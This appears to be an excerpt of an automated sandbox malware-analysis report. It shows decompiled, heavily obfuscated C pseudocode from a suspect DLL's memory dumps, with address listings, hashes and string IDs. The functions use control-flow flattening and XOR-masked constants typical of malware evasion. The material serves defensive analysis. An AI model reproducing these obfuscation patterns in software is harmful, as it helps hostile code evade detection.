                                                                                                                                                                            					__eflags = _t151 - 0xf4b2976;
                                                                                                                                                                            					if(_t151 != 0xf4b2976) {
                                                                                                                                                                            						goto L45;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F5B820(0);
                                                                                                                                                                            					goto L12;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






























                                                                                                                                                                            0x02f6e4ef
                                                                                                                                                                            0x02f6e4f6
                                                                                                                                                                            0x02f6e4fd
                                                                                                                                                                            0x02f6e504
                                                                                                                                                                            0x02f6e506
                                                                                                                                                                            0x02f6e50b
                                                                                                                                                                            0x02f6e513
                                                                                                                                                                            0x02f6e516
                                                                                                                                                                            0x02f6e520
                                                                                                                                                                            0x02f6e525
                                                                                                                                                                            0x02f6e527
                                                                                                                                                                            0x02f6e52c
                                                                                                                                                                            0x02f6e531
                                                                                                                                                                            0x02f6e53e
                                                                                                                                                                            0x02f6e552
                                                                                                                                                                            0x02f6e553
                                                                                                                                                                            0x02f6e557
                                                                                                                                                                            0x02f6e564
                                                                                                                                                                            0x02f6e568
                                                                                                                                                                            0x02f6e570
                                                                                                                                                                            0x02f6e578
                                                                                                                                                                            0x02f6e57d
                                                                                                                                                                            0x02f6e585
                                                                                                                                                                            0x02f6e592
                                                                                                                                                                            0x02f6e596
                                                                                                                                                                            0x02f6e59e
                                                                                                                                                                            0x02f6e5a3
                                                                                                                                                                            0x02f6e5ab
                                                                                                                                                                            0x02f6e5b3
                                                                                                                                                                            0x02f6e5c0
                                                                                                                                                                            0x02f6e5c4
                                                                                                                                                                            0x02f6e5cc
                                                                                                                                                                            0x02f6e5d4
                                                                                                                                                                            0x02f6e5dc
                                                                                                                                                                            0x02f6e5e4
                                                                                                                                                                            0x02f6e5ec
                                                                                                                                                                            0x02f6e5f4
                                                                                                                                                                            0x02f6e5fc
                                                                                                                                                                            0x02f6e601
                                                                                                                                                                            0x02f6e609
                                                                                                                                                                            0x02f6e617
                                                                                                                                                                            0x02f6e61b
                                                                                                                                                                            0x02f6e623
                                                                                                                                                                            0x02f6e623
                                                                                                                                                                            0x02f6e627
                                                                                                                                                                            0x02f6e62f
                                                                                                                                                                            0x02f6e634
                                                                                                                                                                            0x02f6e639
                                                                                                                                                                            0x02f6e641
                                                                                                                                                                            0x02f6e64e
                                                                                                                                                                            0x02f6e652
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e660
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e666
                                                                                                                                                                            0x02f6e666
                                                                                                                                                                            0x02f6e79d
                                                                                                                                                                            0x02f6e7a2
                                                                                                                                                                            0x02f6e7b2
                                                                                                                                                                            0x02f6e747
                                                                                                                                                                            0x02f6e747
                                                                                                                                                                            0x02f6e749
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e660
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e660
                                                                                                                                                                            0x02f6e89d
                                                                                                                                                                            0x02f6e89d
                                                                                                                                                                            0x02f6e89d
                                                                                                                                                                            0x02f6e8a9
                                                                                                                                                                            0x02f6e8b5
                                                                                                                                                                            0x02f6e8b5
                                                                                                                                                                            0x02f6e7a4
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e660
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e660
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e65a
                                                                                                                                                                            0x02f6e672
                                                                                                                                                                            0x02f6e769
                                                                                                                                                                            0x02f6e76a
                                                                                                                                                                            0x02f6e772
                                                                                                                                                                            0x02f6e774
                                                                                                                                                                            0x02f6e777
                                                                                                                                                                            0x02f6e779
                                                                                                                                                                            0x02f6e736
                                                                                                                                                                            0x02f6e736
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e736
                                                                                                                                                                            0x02f6e782
                                                                                                                                                                            0x02f6e789
                                                                                                                                                                            0x02f6e790
                                                                                                                                                                            0x02f6e793
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e793
                                                                                                                                                                            0x02f6e67e
                                                                                                                                                                            0x02f6e740
                                                                                                                                                                            0x02f6e745
                                                                                                                                                                            0x02f6e752
                                                                                                                                                                            0x02f6e752
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e745
                                                                                                                                                                            0x02f6e686
                                                                                                                                                                            0x02f6e72e
                                                                                                                                                                            0x02f6e730
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e730
                                                                                                                                                                            0x02f6e68e
                                                                                                                                                                            0x02f6e6f6
                                                                                                                                                                            0x02f6e6fc
                                                                                                                                                                            0x02f6e6fc
                                                                                                                                                                            0x02f6e703
                                                                                                                                                                            0x02f6e706
                                                                                                                                                                            0x02f6e70c
                                                                                                                                                                            0x02f6e70c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e70c
                                                                                                                                                                            0x02f6e696
                                                                                                                                                                            0x02f6e6dc
                                                                                                                                                                            0x02f6e6e7
                                                                                                                                                                            0x02f6e6ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e6ef
                                                                                                                                                                            0x02f6e69e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e6bb
                                                                                                                                                                            0x02f6e6c0
                                                                                                                                                                            0x02f6e6c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e7b9
                                                                                                                                                                            0x02f6e7b9
                                                                                                                                                                            0x02f6e7bf
                                                                                                                                                                            0x02f6e87f
                                                                                                                                                                            0x02f6e884
                                                                                                                                                                            0x02f6e896
                                                                                                                                                                            0x02f6e89b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e89b
                                                                                                                                                                            0x02f6e886
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e886
                                                                                                                                                                            0x02f6e7c5
                                                                                                                                                                            0x02f6e7cb
                                                                                                                                                                            0x02f6e860
                                                                                                                                                                            0x02f6e865
                                                                                                                                                                            0x02f6e875
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e875
                                                                                                                                                                            0x02f6e867
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e867
                                                                                                                                                                            0x02f6e7d1
                                                                                                                                                                            0x02f6e7d7
                                                                                                                                                                            0x02f6e841
                                                                                                                                                                            0x02f6e846
                                                                                                                                                                            0x02f6e856
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e856
                                                                                                                                                                            0x02f6e848
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e848
                                                                                                                                                                            0x02f6e7d9
                                                                                                                                                                            0x02f6e7df
                                                                                                                                                                            0x02f6e820
                                                                                                                                                                            0x02f6e825
                                                                                                                                                                            0x02f6e837
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e837
                                                                                                                                                                            0x02f6e827
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e827
                                                                                                                                                                            0x02f6e7e1
                                                                                                                                                                            0x02f6e7e7
                                                                                                                                                                            0x02f6e801
                                                                                                                                                                            0x02f6e806
                                                                                                                                                                            0x02f6e816
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e816
                                                                                                                                                                            0x02f6e808
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e808
                                                                                                                                                                            0x02f6e7e9
                                                                                                                                                                            0x02f6e7ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e7f7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e7f7

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$ap@'$-$ma+
                                                                                                                                                                            • API String ID: 0-1845766705
                                                                                                                                                                            • Opcode ID: 04855b25d61c04f4a410d074099d96db991ee1ad7b5cc9988be1f94fca5705b6
                                                                                                                                                                            • Instruction ID: 1d2bef901883a79160f8cc03563d83cdb59301cf997366ce4e7b11ee76c62d69
                                                                                                                                                                            • Opcode Fuzzy Hash: 04855b25d61c04f4a410d074099d96db991ee1ad7b5cc9988be1f94fca5705b6
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C917B766183458BC768CE24C898D3FBBE1FBD4388F04491EE796562A0D7719A49CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E02F63EAA() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				signed int _v524;
                                                                                                                                                                            				signed int _v528;
                                                                                                                                                                            				signed int _v532;
                                                                                                                                                                            				signed int _v536;
                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                            				signed int _v552;
                                                                                                                                                                            				signed int _v556;
                                                                                                                                                                            				signed int _v560;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				signed int _v568;
                                                                                                                                                                            				signed int _v572;
                                                                                                                                                                            				signed int _t134;
                                                                                                                                                                            				void* _t136;
                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                            				void* _t141;
                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                            				signed int _t159;
                                                                                                                                                                            				signed int _t160;
                                                                                                                                                                            				void* _t162;
                                                                                                                                                                            				signed int _t163;
                                                                                                                                                                            				signed int* _t164;
                                                                                                                                                                            
                                                                                                                                                                            				_t164 =  &_v572;
                                                                                                                                                                            				_v540 = 0x8ebbe1;
                                                                                                                                                                            				_v540 = _v540 ^ 0xad58d7a7;
                                                                                                                                                                            				_t141 = 0x14ab4b7;
                                                                                                                                                                            				_v540 = _v540 + 0xffffedc9;
                                                                                                                                                                            				_v540 = _v540 ^ 0xadd357de;
                                                                                                                                                                            				_v568 = 0x9c9bda;
                                                                                                                                                                            				_v568 = _v568 | 0x36ff3ceb;
                                                                                                                                                                            				_v568 = _v568 << 9;
                                                                                                                                                                            				_v568 = _v568 << 0xc;
                                                                                                                                                                            				_v568 = _v568 ^ 0xff6ebe8a;
                                                                                                                                                                            				_v572 = 0xc63a18;
                                                                                                                                                                            				_t158 = 0x35;
                                                                                                                                                                            				_v572 = _v572 / _t158;
                                                                                                                                                                            				_v572 = _v572 + 0x3c6e;
                                                                                                                                                                            				_t162 = 0;
                                                                                                                                                                            				_t159 = 9;
                                                                                                                                                                            				_v572 = _v572 * 0x2b;
                                                                                                                                                                            				_v572 = _v572 ^ 0x00acfd7d;
                                                                                                                                                                            				_v564 = 0xeb3370;
                                                                                                                                                                            				_v564 = _v564 + 0xdf6d;
                                                                                                                                                                            				_v564 = _v564 + 0xffff5689;
                                                                                                                                                                            				_v564 = _v564 + 0xffff8af1;
                                                                                                                                                                            				_v564 = _v564 ^ 0x00e2fb3e;
                                                                                                                                                                            				_v556 = 0xcf22db;
                                                                                                                                                                            				_v556 = _v556 + 0xdc1c;
                                                                                                                                                                            				_v556 = _v556 ^ 0xabcda180;
                                                                                                                                                                            				_v556 = _v556 * 0x79;
                                                                                                                                                                            				_v556 = _v556 ^ 0xd41378ff;
                                                                                                                                                                            				_v536 = 0x8b65e6;
                                                                                                                                                                            				_v536 = _v536 >> 4;
                                                                                                                                                                            				_v536 = _v536 | 0x892333f7;
                                                                                                                                                                            				_v536 = _v536 ^ 0x8920b82e;
                                                                                                                                                                            				_v552 = 0x92756e;
                                                                                                                                                                            				_v552 = _v552 >> 9;
                                                                                                                                                                            				_v552 = _v552 ^ 0x00055fbe;
                                                                                                                                                                            				_v548 = 0xae9165;
                                                                                                                                                                            				_v548 = _v548 >> 8;
                                                                                                                                                                            				_v548 = _v548 << 3;
                                                                                                                                                                            				_v548 = _v548 ^ 0x000d4470;
                                                                                                                                                                            				_v560 = 0x7e7234;
                                                                                                                                                                            				_t163 = _v552;
                                                                                                                                                                            				_t140 = _v552;
                                                                                                                                                                            				_v560 = _v560 * 0x4b;
                                                                                                                                                                            				_v560 = _v560 * 0x7e;
                                                                                                                                                                            				_v560 = _v560 / _t159;
                                                                                                                                                                            				_v560 = _v560 ^ 0x06ab9265;
                                                                                                                                                                            				_v524 = 0x1cfeb9;
                                                                                                                                                                            				_v524 = _v524 + 0xfb24;
                                                                                                                                                                            				_v524 = _v524 ^ 0x001447a0;
                                                                                                                                                                            				_v532 = 0x9f8444;
                                                                                                                                                                            				_t160 = 0x41;
                                                                                                                                                                            				_t161 = _v552;
                                                                                                                                                                            				_v532 = _v532 / _t160;
                                                                                                                                                                            				_v532 = _v532 ^ 0x00060648;
                                                                                                                                                                            				_v528 = 0xb53968;
                                                                                                                                                                            				_v528 = _v528 >> 6;
                                                                                                                                                                            				_v528 = _v528 ^ 0x00025f1c;
                                                                                                                                                                            				while(_t141 != 0x6ff509) {
                                                                                                                                                                            					if(_t141 == 0x14ab4b7) {
                                                                                                                                                                            						_t141 = 0x9db1fde;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if(_t141 == 0x18d2c7e) {
                                                                                                                                                                            							_t140 = E02F609DD(_v536,  &_v520, _v552, _v548);
                                                                                                                                                                            							_t141 = 0x3c9aed4;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t141 == 0x3c9aed4) {
                                                                                                                                                                            								_t134 = E02F5EFE1(_v524, _v532, _v528, _t140);
                                                                                                                                                                            								_t164 =  &(_t164[3]);
                                                                                                                                                                            								_t163 = _t134;
                                                                                                                                                                            								_t141 = 0x6ff509;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t141 == 0x65dbbcc) {
                                                                                                                                                                            									_push(_t141);
                                                                                                                                                                            									_t136 = E02F60ABA(_v568, _v572, __eflags, _v564,  &_v520, _t161, _v556);
                                                                                                                                                                            									_t164 =  &(_t164[5]);
                                                                                                                                                                            									__eflags = _t136;
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										_t141 = 0x18d2c7e;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t141 != 0x9db1fde) {
                                                                                                                                                                            										L15:
                                                                                                                                                                            										__eflags = _t141 - 0xdb9fdb2;
                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t139 = E02F5DD35();
                                                                                                                                                                            										_t161 = _t139;
                                                                                                                                                                            										if(_t139 != 0) {
                                                                                                                                                                            											_t141 = 0x65dbbcc;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t162;
                                                                                                                                                                            				}
                                                                                                                                                                            				_v544 = 0xee725a;
                                                                                                                                                                            				_v544 = _v544 ^ 0x4fb40d60;
                                                                                                                                                                            				_v544 = _v544 | 0x3a9e06c5;
                                                                                                                                                                            				_v544 = _v544 ^ 0x55f97f1d;
                                                                                                                                                                            				__eflags = _t163 - _v544;
                                                                                                                                                                            				_t162 =  ==  ? 1 : _t162;
                                                                                                                                                                            				__eflags = _t162;
                                                                                                                                                                            				_t141 = 0xdb9fdb2;
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}




























                                                                                                                                                                            0x02f63eaa
                                                                                                                                                                            0x02f63eb0
                                                                                                                                                                            0x02f63eba
                                                                                                                                                                            0x02f63ec2
                                                                                                                                                                            0x02f63ec7
                                                                                                                                                                            0x02f63ecf
                                                                                                                                                                            0x02f63ed7
                                                                                                                                                                            0x02f63edf
                                                                                                                                                                            0x02f63ee7
                                                                                                                                                                            0x02f63eec
                                                                                                                                                                            0x02f63ef1
                                                                                                                                                                            0x02f63ef9
                                                                                                                                                                            0x02f63f09
                                                                                                                                                                            0x02f63f0e
                                                                                                                                                                            0x02f63f14
                                                                                                                                                                            0x02f63f1c
                                                                                                                                                                            0x02f63f23
                                                                                                                                                                            0x02f63f26
                                                                                                                                                                            0x02f63f2a
                                                                                                                                                                            0x02f63f32
                                                                                                                                                                            0x02f63f3a
                                                                                                                                                                            0x02f63f42
                                                                                                                                                                            0x02f63f4a
                                                                                                                                                                            0x02f63f52
                                                                                                                                                                            0x02f63f5a
                                                                                                                                                                            0x02f63f62
                                                                                                                                                                            0x02f63f6a
                                                                                                                                                                            0x02f63f77
                                                                                                                                                                            0x02f63f7b
                                                                                                                                                                            0x02f63f83
                                                                                                                                                                            0x02f63f8b
                                                                                                                                                                            0x02f63f90
                                                                                                                                                                            0x02f63f98
                                                                                                                                                                            0x02f63fa0
                                                                                                                                                                            0x02f63fa8
                                                                                                                                                                            0x02f63fad
                                                                                                                                                                            0x02f63fb5
                                                                                                                                                                            0x02f63fbd
                                                                                                                                                                            0x02f63fc2
                                                                                                                                                                            0x02f63fc7
                                                                                                                                                                            0x02f63fcf
                                                                                                                                                                            0x02f63fdc
                                                                                                                                                                            0x02f63fe0
                                                                                                                                                                            0x02f63fe4
                                                                                                                                                                            0x02f63fed
                                                                                                                                                                            0x02f63ff9
                                                                                                                                                                            0x02f63ffd
                                                                                                                                                                            0x02f64005
                                                                                                                                                                            0x02f6400d
                                                                                                                                                                            0x02f64015
                                                                                                                                                                            0x02f6401d
                                                                                                                                                                            0x02f64029
                                                                                                                                                                            0x02f6402c
                                                                                                                                                                            0x02f64030
                                                                                                                                                                            0x02f64034
                                                                                                                                                                            0x02f6403c
                                                                                                                                                                            0x02f64044
                                                                                                                                                                            0x02f64049
                                                                                                                                                                            0x02f64051
                                                                                                                                                                            0x02f64063
                                                                                                                                                                            0x02f64124
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64069
                                                                                                                                                                            0x02f6406f
                                                                                                                                                                            0x02f64118
                                                                                                                                                                            0x02f6411a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64075
                                                                                                                                                                            0x02f6407b
                                                                                                                                                                            0x02f640ed
                                                                                                                                                                            0x02f640f2
                                                                                                                                                                            0x02f640f5
                                                                                                                                                                            0x02f640f7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6407d
                                                                                                                                                                            0x02f64083
                                                                                                                                                                            0x02f640ab
                                                                                                                                                                            0x02f640c2
                                                                                                                                                                            0x02f640c7
                                                                                                                                                                            0x02f640ca
                                                                                                                                                                            0x02f640cc
                                                                                                                                                                            0x02f640d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f640d2
                                                                                                                                                                            0x02f64085
                                                                                                                                                                            0x02f6408b
                                                                                                                                                                            0x02f6415f
                                                                                                                                                                            0x02f6415f
                                                                                                                                                                            0x02f64165
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64091
                                                                                                                                                                            0x02f64095
                                                                                                                                                                            0x02f6409a
                                                                                                                                                                            0x02f6409e
                                                                                                                                                                            0x02f640a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f640a4
                                                                                                                                                                            0x02f6409e
                                                                                                                                                                            0x02f6408b
                                                                                                                                                                            0x02f64083
                                                                                                                                                                            0x02f6407b
                                                                                                                                                                            0x02f6406f
                                                                                                                                                                            0x02f64177
                                                                                                                                                                            0x02f64177
                                                                                                                                                                            0x02f6412e
                                                                                                                                                                            0x02f64138
                                                                                                                                                                            0x02f64141
                                                                                                                                                                            0x02f64149
                                                                                                                                                                            0x02f64155
                                                                                                                                                                            0x02f64157
                                                                                                                                                                            0x02f64157
                                                                                                                                                                            0x02f6415a
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4r~$Zr$n<$p3
                                                                                                                                                                            • API String ID: 0-1989199487
                                                                                                                                                                            • Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
                                                                                                                                                                            • Instruction ID: ef1e7d2fe6dfdd689e0c9b7d1eddfc5504d7c07269d79a3debc99118268461cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
                                                                                                                                                                            • Instruction Fuzzy Hash: E16169725083009FC368DE25C58942FBBE2FBD8798F104A2DF69AA6260D774CA45CF47
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                            			E02F685FF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				char _v80;
                                                                                                                                                                            				char _v148;
                                                                                                                                                                            				void* _t125;
                                                                                                                                                                            				signed int _t148;
                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                            				intOrPtr _t165;
                                                                                                                                                                            				char _t166;
                                                                                                                                                                            
                                                                                                                                                                            				_t165 = _a4;
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_t165);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t125);
                                                                                                                                                                            				_v56 = _v56 & 0x00000000;
                                                                                                                                                                            				_v64 = 0x4c8eee;
                                                                                                                                                                            				_v60 = 0xd08445;
                                                                                                                                                                            				_v12 = 0x2b5b52;
                                                                                                                                                                            				_v12 = _v12 << 0xa;
                                                                                                                                                                            				_v12 = _v12 ^ 0x243df932;
                                                                                                                                                                            				_t148 = 0x1b;
                                                                                                                                                                            				_v12 = _v12 / _t148;
                                                                                                                                                                            				_v12 = _v12 ^ 0x0511db29;
                                                                                                                                                                            				_v32 = 0x4cbd6f;
                                                                                                                                                                            				_v32 = _v32 >> 0xd;
                                                                                                                                                                            				_v32 = _v32 << 0x10;
                                                                                                                                                                            				_v32 = _v32 ^ 0x02619ccd;
                                                                                                                                                                            				_v8 = 0x229cdc;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1dfe7fc6;
                                                                                                                                                                            				_v8 = _v8 + 0x780d;
                                                                                                                                                                            				_v8 = _v8 >> 1;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0ee175b3;
                                                                                                                                                                            				_v40 = 0x8e82d1;
                                                                                                                                                                            				_v40 = _v40 + 0xffffcc21;
                                                                                                                                                                            				_t149 = 0x39;
                                                                                                                                                                            				_v40 = _v40 * 0x69;
                                                                                                                                                                            				_v40 = _v40 ^ 0x3a51eacf;
                                                                                                                                                                            				_v20 = 0xb8087c;
                                                                                                                                                                            				_v20 = _v20 * 0x23;
                                                                                                                                                                            				_v20 = _v20 >> 5;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00c96169;
                                                                                                                                                                            				_v24 = 0x5c9964;
                                                                                                                                                                            				_v24 = _v24 / _t149;
                                                                                                                                                                            				_v24 = _v24 >> 7;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00085b7f;
                                                                                                                                                                            				_v36 = 0xf34403;
                                                                                                                                                                            				_v36 = _v36 * 0x6a;
                                                                                                                                                                            				_v36 = _v36 | 0x7504e0f6;
                                                                                                                                                                            				_v36 = _v36 ^ 0x75b6ad40;
                                                                                                                                                                            				_v28 = 0x74a083;
                                                                                                                                                                            				_v28 = _v28 * 0x7e;
                                                                                                                                                                            				_v28 = _v28 >> 6;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00e859e6;
                                                                                                                                                                            				_v48 = 0x5be020;
                                                                                                                                                                            				_v48 = _v48 << 3;
                                                                                                                                                                            				_v48 = _v48 ^ 0x02dd1a4a;
                                                                                                                                                                            				_v44 = 0xfc2deb;
                                                                                                                                                                            				_v44 = _v44 + 0x1b3b;
                                                                                                                                                                            				_v44 = _v44 ^ 0x00f2ef0d;
                                                                                                                                                                            				_v52 = 0x7de099;
                                                                                                                                                                            				_v52 = _v52 ^ 0xb346769d;
                                                                                                                                                                            				_v52 = _v52 ^ 0xb330844a;
                                                                                                                                                                            				_v16 = 0x4076ee;
                                                                                                                                                                            				_v16 = _v16 * 0xa;
                                                                                                                                                                            				_v16 = _v16 * 0x14;
                                                                                                                                                                            				_v16 = _v16 << 7;
                                                                                                                                                                            				_v16 = _v16 ^ 0x2e751909;
                                                                                                                                                                            				_t150 = _v12;
                                                                                                                                                                            				_push( &_v148);
                                                                                                                                                                            				_t166 = 0x44;
                                                                                                                                                                            				_push(_t166);
                                                                                                                                                                            				E02F6FE2A(_v12, _v32);
                                                                                                                                                                            				_v148 = _t166;
                                                                                                                                                                            				if(E02F72C24(_a8, _v8, _v12, _t150, _v40, _t150, _v20, _a20, _v24,  &_v148, _t150, _v36, _v28, _t150, _a12,  &_v80) == 0) {
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t165 == 0) {
                                                                                                                                                                            					E02F71538(_v48, _v44, _v80);
                                                                                                                                                                            					E02F71538(_v52, _v16, _v76);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}


























                                                                                                                                                                            0x02f6860a
                                                                                                                                                                            0x02f6860d
                                                                                                                                                                            0x02f6860f
                                                                                                                                                                            0x02f68612
                                                                                                                                                                            0x02f68615
                                                                                                                                                                            0x02f68618
                                                                                                                                                                            0x02f6861b
                                                                                                                                                                            0x02f6861e
                                                                                                                                                                            0x02f6861f
                                                                                                                                                                            0x02f68620
                                                                                                                                                                            0x02f68621
                                                                                                                                                                            0x02f68626
                                                                                                                                                                            0x02f6862c
                                                                                                                                                                            0x02f68633
                                                                                                                                                                            0x02f6863a
                                                                                                                                                                            0x02f68641
                                                                                                                                                                            0x02f68645
                                                                                                                                                                            0x02f68651
                                                                                                                                                                            0x02f68656
                                                                                                                                                                            0x02f6865b
                                                                                                                                                                            0x02f68662
                                                                                                                                                                            0x02f68669
                                                                                                                                                                            0x02f6866d
                                                                                                                                                                            0x02f68671
                                                                                                                                                                            0x02f68678
                                                                                                                                                                            0x02f6867f
                                                                                                                                                                            0x02f68686
                                                                                                                                                                            0x02f6868d
                                                                                                                                                                            0x02f68690
                                                                                                                                                                            0x02f68697
                                                                                                                                                                            0x02f6869e
                                                                                                                                                                            0x02f686a9
                                                                                                                                                                            0x02f686aa
                                                                                                                                                                            0x02f686ad
                                                                                                                                                                            0x02f686b4
                                                                                                                                                                            0x02f686bf
                                                                                                                                                                            0x02f686c2
                                                                                                                                                                            0x02f686c6
                                                                                                                                                                            0x02f686cd
                                                                                                                                                                            0x02f686d9
                                                                                                                                                                            0x02f686dc
                                                                                                                                                                            0x02f686e0
                                                                                                                                                                            0x02f686e7
                                                                                                                                                                            0x02f686f2
                                                                                                                                                                            0x02f686f5
                                                                                                                                                                            0x02f686fc
                                                                                                                                                                            0x02f68703
                                                                                                                                                                            0x02f6870e
                                                                                                                                                                            0x02f68711
                                                                                                                                                                            0x02f68715
                                                                                                                                                                            0x02f6871c
                                                                                                                                                                            0x02f68723
